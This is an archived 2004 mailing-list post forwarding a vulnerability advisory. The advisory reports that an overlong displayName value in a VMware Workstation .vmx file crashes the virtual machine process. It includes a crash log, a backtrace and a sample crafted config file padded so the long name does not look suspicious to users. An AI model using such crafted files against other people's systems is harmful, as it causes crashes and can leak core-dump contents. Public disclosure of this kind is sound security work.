FW: Returned post for vuln-dev@securityfocus.com

From: josh gilmour (joshg_at_conqwest.com)
Date: 06/01/04

  • Next message: Joseph Blade: "openssh buffer_append_space vulnerability"
    To: vuln-dev@securityfocus.com
    Date: Tue, 1 Jun 2004 09:10:25 -0400 

    I sent it to bugtraq...
    >>>>> -------------------- >>>>>
    Since there are no direct security consequences here, this probably needs
    some further analysis so I am going to reject it. Vuln-Dev
    (vuln-dev@securityfocus.com) is a suitable forum for this post and I
    encourage you to post it there.
    <<<<< -------------------- <<<<<

    -----Original Message-----
    From: vuln-dev-owner@securityfocus.com
    Sent: Friday, May 28, 2004 6:35 PM
    To: josh gilmour
    Subject: Returned post for vuln-dev@securityfocus.com

    Hi! This is the ezmlm program. I'm managing the
    vuln-dev@securityfocus.com mailing list.

    I'm working for my owner, who can be reached
    at vuln-dev-owner@securityfocus.com.

    I'm sorry, your message (enclosed) was not accepted by the moderator.
    If the moderator has made any comments, they are shown below.

    >>>>> -------------------- >>>>>
    Unless for some reason this isn't accepted to Bugtraq I'm going to reject
    this, because it's more suited for the other list.
    <<<<< -------------------- <<<<<


    attached mail follows:

    To: vuln-dev@securityfocus.com
    Date: Thu, 27 May 2004 14:10:12 -0400

    -----Original Message-----
    From: josh gilmour
    Sent: Thursday, May 27, 2004 10:00 AM
    To: bugtraq@securityfocus.com
    Subject: VMWare Workstation Crash Advisory

    Bugtraq: Please post

    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

    VMWare Workstation Crash Advisory

    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

    ----- General Info

            Risk: Low

            Info: VMWare Workstation Configuration File (.vmx) displayName=""
    crash due to long buffer.

            Date: 5/27/04

            Found by: Josh Gilmour <joshg at conqwest dot com>

    ----- Overview

            VMware saves a configuration file by default within

            \Documents and Settings\<user>\My Documents\My Virtual
    Machines\<Virtual Machine Name>

            Within this configuration file (designated by .vmx extension), there
    are various variables.

            One variable displayName="" can be overflowed with a buffer longer
    than 255 characters.

            During testing purposes I used the original name + blank spaces to
    equal 255 characters.


            Note: that this does not crash the ENTIRE program, but rather gives
    the error message:

            "VMWare Workstation unrecoverable error: (vmx)

             F(5093):190 Buffer too small 0x41e986

             A log file is available in '\Documents and Settings\<user>\My

             \My Virtual Machines\<Virtual Machine Name>\vmware.log'. A core
    dump file

             is available in '\Documents and Settings\<user>\Application

             \vmware-vmx-***.dmp'... Please request support, blah blah blah"


            Upon result of the crash, the user is left with a vmware.log file,
    and a core dump.

            Both these files may have sensitive information within them.

    ----- Background


            "VMware Workstation is powerful virtual machine software for
    developers and system

            administrators who want to revolutionize software development,
    testing and deployment

            in their enterprise. Shipping for more than five years and winner of
    over a dozen major

            product awards, VMware Workstation enables software developers to
    develop and test the

            most complex networked server-class applications running on
    Microsoft Windows, Linux

            or NetWare all on a single desktop. Essential features such as
    virtual networking,

            live snapshots, drag and drop and shared folders, and PXE support
    make VMware

            Workstation the most powerful and indispensable tool for enterprise
    IT developers

            and system administrators." - quoted from the site www.vmware.com

    ----- Affected Packages

            ........ product ............... OS ............. ver # .........

            1 - vmware workstation / various Windows OS / 4.5.1 - build 7568

            Note: Linux systems have not been tested, yet its a possibility this
    could affect them also.

            If anyone has vmware on linux, please try this out, and get back to
    me on the results.


    ----- Impact

            Besides being an annoyance, I do not know of any SERIOUS impacts
    that could occur,

            except for maybe sensitive information being leaked in the core
    file, or .log file.

            Although, it COULD BE possible for a buffer overflow or something,
    but I'm not qualified

            to determine that. It seems like a buffer overflow attack, when the
    server is crashed,

            yet the normal microsoft debugger doesn't pop up, and vmware doesn't
    crash entirely, just

            the running vmware OS.

            It should also be noted, that you don't need the actual image file
    for vmware, if you

            have a setting wrong in the configuration file, VMware wont even
    start the virtual

            machine, and give an error saying the image file isn't present.
    Since the config file is

            only < 1k in size, it could be sent quickly without any time for
    downloading. When opened

            the config file, checks displayName first (i believe) causing it not
    to prompt for the

            actual image file, and instead just crash, and dump core. (not


    ----- Vmware.log OUTPUT

            Just a sample output:

            May 27 12:38:57: vmx| MM: Using partialmap, 98304 pages AC 0 CE 0 TM

            May 27 12:38:57: vmx| STATDECLGROUP stats Root "" null

            May 27 12:38:57: vmx| F(5093):190 Buffer too small 0x41e968

            May 27 12:38:57: vmx| Backtrace:

            May 27 12:38:57: vmx| ----Backtrace using dbghelp.dll----

            May 27 12:38:57: vmx| Module path: C:\Program Files\VMware\VMware

            May 27 12:38:57: vmx| Module directory: C:\Program
    Files\VMware\VMware Workstation\bin\

            May 27 12:38:57: vmx| backtrace[00] ebp 0x0012f754 eip 0x0053e5ca
    params 0x0012fb74 0x00409aee 0000000000 0x00000003 [C:\Program
    Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
    0x0001:0x0013d5ca] (no symbol information)

            May 27 12:38:57: vmx| backtrace[01] ebp 0x0012f75c eip 0x0053f9d1
    params 0000000000 0x00000003 0x00d10568 0x00d10468 [C:\Program
    Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
    0x0001:0x0013e9d1] (no symbol information)

            May 27 12:38:57: vmx| backtrace[02] ebp 0x0012fb74 eip 0x00409aee
    params 0x005bb04c 0x005bb06c 0x000000be 0x0041e968 [C:\Program
    Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
    0x0001:0x00008aee] (no symbol information)

            May 27 12:38:57: vmx| backtrace[03] ebp 0x0012fb90 eip 0x004f31e7
    params 0x0012fba8 0x00d10468 0x000000ff 0x00567540 [C:\Program
    Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
    0x0001:0x000f21e7] (no symbol information)

            May 27 12:38:57: vmx| backtrace[04] ebp 0x0012fca8 eip 0x0041e968
    params 0x00133c90 0x00c9f268 0x00c9f3f8 0x0012fce0 [C:\Program
    Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
    0x0001:0x0001d968] (no symbol information)

            May 27 12:38:57: vmx| backtrace[05] ebp 0x0012fcbc eip 0x004139de
    params 0000000000 0x0000074f 0x00000004 0x00000004 [C:\Program
    Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
    0x0001:0x000129de] (no symbol information)

            May 27 12:38:57: vmx| backtrace[06] ebp 0x0012fce0 eip 0x004093b8
    params 0000000000 0000000000 0x00000004 0x00134270 [C:\Program
    Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
    0x0001:0x000083b8] (no symbol information)

            May 27 12:38:57: vmx| backtrace[07] ebp 0x0012fd10 eip 0x00409104
    params 0x00000004 0x0012fd24 0x005d6488 0x001342ad [C:\Program
    Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
    0x0001:0x00008104] (no symbol information)

            May 27 12:38:57: vmx| backtrace[08] ebp 0x0012ff24 eip 0x00401fb7
    params 0x00400000 0000000000 0x00134270 0x0000000a [C:\Program
    Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
    0x0001:0x00000fb7] (no symbol information)

            May 27 12:38:57: vmx| backtrace[09] ebp 0x0012ffc0 eip 0x00401134
    params 0000000000 0x015ae5c8 0x7ffdf000 0000000000 [C:\Program
    Files\VMware\VMware Workstation\bin\vmware-vmx.exe base 0x00400000
    0x0001:0x00000134] (no symbol information)

            May 27 12:38:57: vmx| backtrace[10] ebp 0x0012fff0 eip 0x7c581af6
    params 0x00401000 0000000000 0x000000c8 0x00000100
    [C:\WINNT\system32\KERNEL32.dll base 0x7c570000 0x0001:0x00010af6]
    (OpenEventA + 0x063d)

            May 27 12:38:57: vmx| ----End of backtrace----

            May 27 12:38:57: vmx| W32Util_CoreDump: faking exception to get

            May 27 12:38:57: vmx| CoreDump: Writing minidump to C:\Documents and
    Settings\<user>\Application Data\VMware\vmware-vmx-848.dmp

            May 27 12:38:57: vmx| CoreDump: including module base 0x00400000
    size 0x00389000

            May 27 12:38:57: vmx| checksum 0x00000000 timestamp 0x404e4180

            May 27 12:38:57: vmx| image file C:\Program Files\VMware\VMware

            May 27 12:38:57: vmx| file version

            <bunch of CoreDump: stuff here>

            May 27 12:38:57: vmx| CoreDump: Including thread 304

            May 27 12:38:57: vmx| Msg_Post: Error

            May 27 12:38:57: vmx| [msg.log.error.unrecoverable] VMware
    Workstation unrecoverable error: (vmx)

            May 27 12:38:57: vmx| F(5093):190 Buffer too small 0x41e968

            May 27 12:38:57: vmx| [msg.panic.haveLog] A log file is available in
    "C:\Documents and Settings\<user>\My Documents\My Virtual Machines\Windows
    Server 2003 Enterprise Edition\vmware.log". [msg.panic.haveCore] A core
    file is available in "C:\Documents and Settings\<user>\Application
    Data\VMware\vmware-vmx-848.dmp". [msg.panic.requestSupport.withLogAndCore]
    Please request support and include the contents of the log file and core
    file. [msg.panic.response] We will respond on the basis of your support

            May 27 12:38:57: vmx| ----------------------------------------

            May 27 12:38:59: vmx| VTHREAD thread 0 start exiting

            May 27 12:38:59: vmx| VTHREAD thread 0 exiting, 0 left

    ----- Exploit [If it can even be called that]

            Put the following in a new .vmx file, call it whatever...

            open it up in vmware, and then start the virtual machine.

            Note: Ive changed displayName to have it say 'Windows Server
    Enterprise 2003 [followed

             by a lot of spaces] that way when you load it up in vmware, it

             seem suspicious, it just says "Windows Server 2003 Enterprise" with
    a "..." at the

             right hand portion of the screen, which MOST users wouldnt even

            -- cut win2k3-enterprise.vmx --


            config.version = "7"

            virtualHW.version = "3"

            scsi0.present = "TRUE"

            memsize = "384"

            ide0:0.present = "TRUE"

            ide0:0.fileName = "Windows Server 2003 Enterprise Edition.vmdk"

            ide1:0.present = "TRUE"

            ide1:0.fileName = "auto detect"

            ide1:0.deviceType = "cdrom-raw"

            floppy0.present = "FALSE"

            Ethernet0.present = "TRUE"

            sound.present = "TRUE"

            sound.fileName = "-1"

            # note displayName having a LONG name. 256 characters to be exact.
    And it all must be on one line, so if your email client wrapped it, fix it
    to one line

            displayName = "Windows Server 2003 Enterprise

            guestOS = "WinNT"

            priority.grabbed = "normal"

            priority.ungrabbed = "normal"

            ide1:0.startConnected = "TRUE"

            Ethernet0.addressType = "generated"

            uuid.location = "56 4d 7e 36 32 6b 5c 21-f1 0c d5 03 9f 17 2f 00"

            uuid.bios = "56 4d 7e 36 32 6b 5c 21-f1 0c d5 03 9f 17 2f 00"

            ethernet0.generatedAddress = "00:0c:29:17:2f:00"

            ethernet0.generatedAddressOffset = "0"

            tools.syncTime = "TRUE"

            -- end cut --

    ----- Vendor Status


            Not alerted. Its not a big deal from what i can see, and they'll see
    this post anyways.


    ----- Contact Information

            Josh Gilmour

            joshg @ <nospam> conqwest.com


            Please forgive my horrible spelling and grammar :)

  • Next message: Joseph Blade: "openssh buffer_append_space vulnerability"